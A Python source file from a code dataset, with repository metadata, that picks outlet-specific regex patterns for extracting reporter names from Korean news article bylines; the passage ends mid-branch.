main() | 39.265306 | 177 | 0.57921 | 1,236 | 9,620 | 4.330097 | 0.157767 | 0.020179 | 0.033632 | 0.031764 | 0.795404 | 0.78139 | 0.765321 | 0.748132 | 0.748132 | 0.748132 | 0 | 0.023165 | 0.277547 | 9,620 | 245 | 178 | 39.265306 | 0.746906 | 0.022141 | 0 | 0.716667 | 0 | 0.011111 | 0.113085 | 0.030638 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.033333 | 0 | 0.066667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7880cbcc3ecfe5a378a706dbe1133d89ed035537 | 32,924 | py | Python | nt-worker/newGetByline/byLineParserSelector.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | 1 | 2022-02-25T02:35:09.000Z | 2022-02-25T02:35:09.000Z | nt-worker/newGetByline/byLineParserSelector.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | nt-worker/newGetByline/byLineParserSelector.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | from .byLineClass import MainBylineParser
# init
def getByLineParser(target: str):
target = target.lower()
# def __init__(self,boardPattenAdd:list,selfPatten:list,includeText:list):
boardPattern = []
selfPattern = []
includeText = []
if "kbs" in target:
selfPattern = ["KBS\\s?뉴스\\s?([가-힣]{2,4})\\s?입니다?",
"뉴스[,\\s]*([가-힣]{2,4})입니다",
"([가-힣]{2,4}) 기잡니다.",
"제작:([가-힣]{2,4})",
"업그레이드[,\\s]*([가-힣]{2,4})입니다.",
"톡톡 ([가-힣]{2,4})입니다."]
includeText = ["SBS 뉴미디어부"]
return MainBylineParser(boardPattern, selfPattern, includeText)
elif "ytn" in target:
selfPattern = ["([가-힣]{2,4})\\s?\\[email",
"YTN ([가-힣]{2,4})입니다.",
"([가-힣]{2,4})\\s?PD\\s?\\[email",
"([가-힣]{2,4})\\s?기자\\s?\\[email",
"뉴스가 있는 저녁 ([가-힣]{2,4})입니다.",
"영상 편집 : ([가-힣]{2,4})",
"YTN Star ([가-힣]{2,4}) 기자",
"구성 ([가-힣]{2,4})",
"취재기자: ([가-힣]{2,4})",
"YTN PLUS ([가-힣]{2,4}) 기자",
"([가-힣]{2,4})\\s?\\(email",
"([가-힣]{2,4})\\s?PD\\s?\\(email",
"([가-힣]{2,4})\\s?기자\\s?\\(email",
"낚시채널 FTV\\s?\\(([가-힣]{2,4})\\)",
"VJ ([가-힣]{2,4})"
"vj ([가-힣]{2,4})"
]
boardPattern = ["의 앵커", "앵커", "-VJ", "-구성"]
includeText = ["에이앤뉴스"]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "mbc" in target:
selfPattern = ["뉴스\\s?([가-힣]{2,4})\\s?입니다.",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "obs" in target:
selfPattern = [
"([가-힣]{2,4})\\s?\\(email",
# 김정수(webmaster@obs.co.kr)
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "sbs" in target:
boardPattern = ["국방전문기자"]
includeText = ["SBS 뉴미디어부"]
selfPattern = ["KBC\\s?([가-힣]{2,4})\\s?기자",
"([가-힣]{2,4}) SBS 기자"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "헤럴드경제" in target:
includeText = ["아트데이"]
boardPattern = ["건설부동산부"]
selfPattern = [
"헤럴드경제\\s?([가-힣]{2,4})\\s?기자",
"([가-힣]{2,4})\\s?기자"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한라일보" in target:
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한국일보" in target:
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한국경제" in target:
includeText = []
selfPattern = [
"([가-힣]{2,4})\\s?한경닷컴\\s?기자",
"([가-힣]{2,4})\\s?한경닷컴\\s?객원",
"([가-힣]{2,4})\\s?한경닷컴\\s?연예",
"한경닷컴\\s?([가-힣]{2,4})\\s?기자",
"([가-힣]{2,4})\\s?기자\\s?email",
"([가-힣]{2,4}) 뉴스룸 email"
]
boardPattern = ["한국경제신문", "논설위원", "웰스에듀", "여행레저전문기자"]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한겨레" in target:
boardPattern = ["한국경제신문", "논설위원", "ㅣ논설위원", "객원기자", "선임기자"
, "책지성팀장", "ㅣ젠더데스크 ", " ㅣ 디지털콘텐츠부", "ㅣ베이징 특파원", "사람과디지털연구소장"
, "ㅣ에디터부문장", "|국제부", "ㅣ 저널리즘책무실장"
]
selfPattern = [
"([가-힣]{2,4})\\s?종교전문기자\\s?email",
"([가-힣]{2,4})\\s?선임기자\\s?email",
"([가-힣]{2,4})\\s?기자\\s?email",
"([가-힣]{2,4})\\s?\\(email",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "파이낸셜뉴스" in target:
boardPattern = ["논설실장", "골프전문기자", "생활경제부장", "정치부장", "정책사회부장",
"정보미디어부", "블록체인팀", "부국장", "논설위원", "국제부장"
]
selfPattern = [
"email\\s?([가-힣]{2,4})\\s?기자",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "충청투데이" in target:
# boardPattern = ["논설실장","골프전문기자","생활경제부장","정치부장","정책사회부장",
# "정보미디어부", "블록체인팀", "부국장","논설위원","국제부장"
# ]
# =조재광 기자 cjk9230@cctoday.co.kr
selfPattern = [
"\\[충청투데이\\s?([가-힣]{2,4})\\s?기자",
"\\[충청투데이\\s?([가-힣]{2,4})",
"([가-힣]{2,4})\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "충청일보" in target:
# boardPattern = ["논설실장","골프전문기자","생활경제부장","정치부장","정책사회부장",
# "정보미디어부", "블록체인팀", "부국장","논설위원","국제부장"
# ]
# =조재광 기자 cjk9230@cctoday.co.kr
selfPattern = [
"\\[충청투데이\\s?([가-힣]{2,4})\\s?기자",
"\\[충청투데이\\s?([가-힣]{2,4})",
"([가-힣]{2,4})\\s?기자\\s?email",
"=([가-힣]{2,4})\\s?기자",
]
# 김미나 기자 mina@hani.co.kr
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
# 충청일보
elif "충북일보" in target:
selfPattern = [
"\\/\\s?([가-힣]{2,4})\\s?기자",
"사진=([가-힣]{2,4})",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "중앙일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"제작=([가-힣]{2,4})",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "중부일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
# 중앙일보
elif "중부매일" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "중도일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부"
]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "조선일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "제민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "전자신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "전북일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "전북도민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자"]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "전남일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자"]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "울산매일" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자"]
selfPattern = [
"=([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "영남일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자"]
selfPattern = [
"=([가-힣]{2,4})기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "아주경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "팀장", "편집국장"]
selfPattern = [
"=([가-힣]{2,4})기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True,
backFirst=True)
elif "아시아경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "팀장", "편집국장"]
selfPattern = [
"=([가-힣]{2,4})\\s기자",
"([가-힣]{2,4})\\s?기자\\s?email"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "세계일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "서울신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "서울경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "부산일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
# 현화영 기자 hhy@segye.com
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "문화일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소"]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "무등일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
"\\/\\s?([가-힣]{2,4})\\s?email",
"=([가-힣]{2,4})\\s기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "머니투데이" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
"\\[머니투데이\\s?([가-힣]{2,4})\\s?기자",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "매일신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
    # TODO: the 매일경제 (Maeil Business Newspaper) patterns below still need revision!!!!
elif "매일경제" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "감정평가사"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
"\\[스타투데이\\s?([가-힣]{2,4})\\s?기자",
"\\[([가-힣]{2,4})\\s?매일경제",
# 이종혁 매일경제
# 스타투데이 양소영 기자
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "디지털타임스" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국"
]
selfPattern = [
# "([가-힣]{2,4})\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "동아일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?동아닷컴\\s?기자\\s?email",
"동아닷컴\\s?([가-힣]{2,4})\\s?\\s?기자\\s?email",
"동아닷컴\\s?([가-힣]{2,4})\\s?\\s?기자\\s?email",
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "대전일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "대구일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "내일신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "국제신문" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장"
]
selfPattern = [
"([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "국민일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "광주일보" in target:
boardPattern = ["정치팀장", "사회2팀장", "고용노동전문기자 email", "종교전문기자", "문화선임기자", "야구팀장", "논설실장"
, "골프전문기자", "사진전문기자", "문화선임기자", "산업1팀장", "논설위원", "인턴기자", "사회에디터", "고용노동전문기자", "프리랜서"
, "경제산업부디렉터", "중앙컬처", "경제부장", "시인", "소설가", "경기도박물관장", "경제사회교육부", "정치행정부", "전자신문인터넷"
, "도민기자", "중부지역본부장", "수습기자", "국제경제팀", "편집국장", "온라인 뉴스", "선임 기자", "평화연구소", "문화부 차장"
, "취재2부", "취재1부장", "신문제작국", "스포츠부 차장", "편집부국장", "문화전문기자", "교육전문기자", "사회부장"
]
selfPattern = [
# "([가-힣]{2,4})\\s?\\s?기자\\s?email",
# "\\/\\s?([가-힣]{2,4})\\s?기자\\s?email",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True, backContent=True)
elif "광주매일신문" in target:
